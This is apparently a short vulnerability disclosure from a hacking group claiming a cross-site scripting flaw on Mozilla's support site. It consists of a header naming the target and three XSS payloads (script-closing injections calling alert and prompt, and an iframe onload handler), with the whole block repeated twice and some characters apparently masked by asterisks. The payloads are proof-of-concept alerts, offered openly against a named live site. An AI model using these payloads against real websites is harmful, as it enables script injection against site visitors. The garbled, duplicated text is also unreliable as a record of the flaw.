endLesS
Webmaster
<------------------ header data start ------------------- >
#############################################################
# Application Name : Mozilla XSS Vuln.
# Vulnerable Type : Cross-Site Scripting
# Bug Fix Advice : Harmful characters can be filtered out.
# Vendor Homepage : https://www.mozilla.org/en-US/firefox/new/
# Author : Cyber Warrior | Bug Researchers Group | AaCcTt
# Author Contact : http://www.Cyber-warrior.org/198620
# Target : https://support.mozilla.org/
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
>**********alert(CWBUGRESEARCHERSAaCcTt)</script>
></script>**********prompt(CWBUGRESEARCHERSAaCcTt)</script>
><iframe onload=alert(/CWBUGRESEARCHERSAaCcTt/)>
< -- / bug code end of -- >
#############################################################
# Application Name : Mozilla XSS Vuln.
# Vulnerable Type : Cross-Site Scripting
# Bug Fix Advice : Harmful characters can be filtered out.
# Vendor Homepage : https://www.mozilla.org/en-US/firefox/new/
# Author : Cyber Warrior | Bug Researchers Group | AaCcTt
# Author Contact : http://www.Cyber-warrior.org/198620
# Target : https://support.mozilla.org/
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
>**********alert(CWBUGRESEARCHERSAaCcTt)</script>
></script>**********prompt(CWBUGRESEARCHERSAaCcTt)</script>
><iframe onload=alert(/CWBUGRESEARCHERSAaCcTt/)>
< -- / bug code end of -- >